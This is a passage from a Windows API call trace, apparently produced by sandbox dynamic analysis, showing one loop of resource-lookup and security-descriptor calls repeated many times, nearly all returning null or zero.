ReturnLength=0x209ddd4) returned 0 [0219.802] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.802] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.802] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.802] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.802] LockResource (hResData=0x0) returned 0x0 [0219.802] FreeResource (hResData=0x0) returned 0 [0219.802] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.802] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.802] LockResource (hResData=0x0) returned 0x0 [0219.802] FreeResource (hResData=0x0) returned 0 [0219.802] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.802] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.802] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.803] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.803] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.803] LockResource (hResData=0x0) returned 0x0 [0219.803] FreeResource (hResData=0x0) returned 0 [0219.803] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.803] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.803] LockResource (hResData=0x0) returned 0x0 [0219.803] FreeResource (hResData=0x0) returned 0 [0219.803] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.803] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.803] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.803] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.803] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.803] LockResource (hResData=0x0) returned 0x0 [0219.803] FreeResource (hResData=0x0) returned 0 [0219.803] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.803] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.803] LockResource (hResData=0x0) returned 0x0 [0219.803] FreeResource (hResData=0x0) returned 0 [0219.803] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.803] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.803] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.803] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.803] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.803] LockResource (hResData=0x0) returned 0x0 [0219.803] FreeResource (hResData=0x0) returned 0 [0219.803] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.803] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.803] LockResource (hResData=0x0) returned 0x0 [0219.803] FreeResource (hResData=0x0) returned 0 [0219.803] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.803] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.803] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.803] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.803] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.803] LockResource (hResData=0x0) returned 0x0 [0219.803] FreeResource (hResData=0x0) returned 0 [0219.803] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.803] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.803] LockResource (hResData=0x0) returned 0x0 [0219.803] FreeResource (hResData=0x0) returned 0 [0219.803] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.803] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.803] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.803] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.803] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.803] LockResource (hResData=0x0) returned 0x0 [0219.803] FreeResource (hResData=0x0) returned 0 [0219.803] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.803] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.804] LockResource (hResData=0x0) returned 0x0 [0219.804] FreeResource (hResData=0x0) returned 0 [0219.804] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.804] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.804] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.804] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.804] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.804] LockResource (hResData=0x0) returned 0x0 [0219.804] FreeResource (hResData=0x0) returned 0 [0219.804] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.804] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.804] LockResource (hResData=0x0) returned 0x0 [0219.804] FreeResource (hResData=0x0) returned 0 [0219.804] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.804] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.804] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.804] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.804] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.804] LockResource (hResData=0x0) returned 0x0 [0219.804] FreeResource (hResData=0x0) returned 0 [0219.804] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.804] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.804] LockResource (hResData=0x0) returned 0x0 [0219.804] FreeResource (hResData=0x0) returned 0 [0219.804] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.804] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.804] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.804] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.804] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.804] LockResource (hResData=0x0) returned 0x0 [0219.804] FreeResource (hResData=0x0) returned 0 [0219.804] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.804] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.804] LockResource (hResData=0x0) returned 0x0 [0219.804] FreeResource (hResData=0x0) returned 0 [0219.804] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.804] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.804] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.804] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.804] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.804] LockResource (hResData=0x0) returned 0x0 [0219.804] FreeResource (hResData=0x0) returned 0 [0219.804] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.804] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.804] LockResource (hResData=0x0) returned 0x0 [0219.804] FreeResource (hResData=0x0) returned 0 [0219.804] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.804] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.804] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.804] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.805] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.805] LockResource (hResData=0x0) returned 0x0 [0219.805] FreeResource (hResData=0x0) returned 0 [0219.805] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.805] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.805] LockResource (hResData=0x0) returned 0x0 [0219.805] FreeResource (hResData=0x0) returned 0 [0219.805] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.805] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.805] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.805] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.805] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.805] LockResource (hResData=0x0) returned 0x0 [0219.805] FreeResource (hResData=0x0) returned 0 [0219.805] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.805] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.805] LockResource (hResData=0x0) returned 0x0 [0219.805] FreeResource (hResData=0x0) returned 0 [0219.805] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.805] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.805] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.805] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.805] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.805] LockResource (hResData=0x0) returned 0x0 [0219.805] FreeResource (hResData=0x0) returned 0 [0219.805] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.805] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.805] LockResource (hResData=0x0) returned 0x0 [0219.805] FreeResource (hResData=0x0) returned 0 [0219.805] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.805] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.805] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.805] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.805] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.805] LockResource (hResData=0x0) returned 0x0 [0219.805] FreeResource (hResData=0x0) returned 0 [0219.805] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.805] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.805] LockResource (hResData=0x0) returned 0x0 [0219.805] FreeResource (hResData=0x0) returned 0 [0219.805] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.805] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.805] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.805] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.805] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.805] LockResource (hResData=0x0) returned 0x0 [0219.805] FreeResource (hResData=0x0) returned 0 [0219.805] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.806] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.806] LockResource (hResData=0x0) returned 0x0 [0219.806] FreeResource (hResData=0x0) returned 0 [0219.806] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.806] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.806] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.806] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.806] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.806] LockResource (hResData=0x0) returned 0x0 [0219.806] FreeResource (hResData=0x0) returned 0 [0219.806] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.806] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.806] LockResource (hResData=0x0) returned 0x0 [0219.806] FreeResource (hResData=0x0) returned 0 [0219.806] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.806] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.806] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.806] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.806] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.806] LockResource (hResData=0x0) returned 0x0 [0219.806] FreeResource (hResData=0x0) returned 0 [0219.806] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.806] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.806] LockResource (hResData=0x0) returned 0x0 [0219.806] FreeResource (hResData=0x0) returned 0 [0219.806] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.806] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.806] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.806] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.806] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.806] LockResource (hResData=0x0) returned 0x0 [0219.806] FreeResource (hResData=0x0) returned 0 [0219.806] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.806] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.806] LockResource (hResData=0x0) returned 0x0 [0219.806] FreeResource (hResData=0x0) returned 0 [0219.806] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.806] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.806] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.806] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.806] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.806] LockResource (hResData=0x0) returned 0x0 [0219.806] FreeResource (hResData=0x0) returned 0 [0219.806] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.806] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.806] LockResource (hResData=0x0) returned 0x0 [0219.806] FreeResource (hResData=0x0) returned 0 [0219.806] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.807] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.807] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.807] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.807] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.807] LockResource (hResData=0x0) returned 0x0 [0219.807] FreeResource (hResData=0x0) returned 0 [0219.807] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.807] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.807] LockResource (hResData=0x0) returned 0x0 [0219.807] FreeResource (hResData=0x0) returned 0 [0219.807] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.807] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.807] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.807] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.807] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.807] LockResource (hResData=0x0) returned 0x0 [0219.807] FreeResource (hResData=0x0) returned 0 [0219.807] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.807] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.807] LockResource (hResData=0x0) returned 0x0 [0219.807] FreeResource (hResData=0x0) returned 0 [0219.807] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.807] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.807] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.807] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.807] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.807] LockResource (hResData=0x0) returned 0x0 [0219.807] FreeResource (hResData=0x0) returned 0 [0219.807] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.807] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.807] LockResource (hResData=0x0) returned 0x0 [0219.807] FreeResource (hResData=0x0) returned 0 [0219.807] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.807] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.807] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.807] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.807] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.807] LockResource (hResData=0x0) returned 0x0 [0219.807] FreeResource (hResData=0x0) returned 0 [0219.807] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.807] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.807] LockResource (hResData=0x0) returned 0x0 [0219.807] FreeResource (hResData=0x0) returned 0 [0219.807] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.807] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.807] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.807] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.808] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.808] LockResource (hResData=0x0) returned 0x0 [0219.808] FreeResource (hResData=0x0) returned 0 [0219.808] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.808] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.808] LockResource (hResData=0x0) returned 0x0 [0219.808] FreeResource (hResData=0x0) returned 0 [0219.808] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.808] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.808] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.808] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.808] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.808] LockResource (hResData=0x0) returned 0x0 [0219.808] FreeResource (hResData=0x0) returned 0 [0219.808] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.808] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.808] LockResource (hResData=0x0) returned 0x0 [0219.808] FreeResource (hResData=0x0) returned 0 [0219.808] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.808] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.808] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.808] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.808] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.808] LockResource (hResData=0x0) returned 0x0 [0219.808] FreeResource (hResData=0x0) returned 0 [0219.808] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.808] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.808] LockResource (hResData=0x0) returned 0x0 [0219.808] FreeResource (hResData=0x0) returned 0 [0219.808] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.808] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 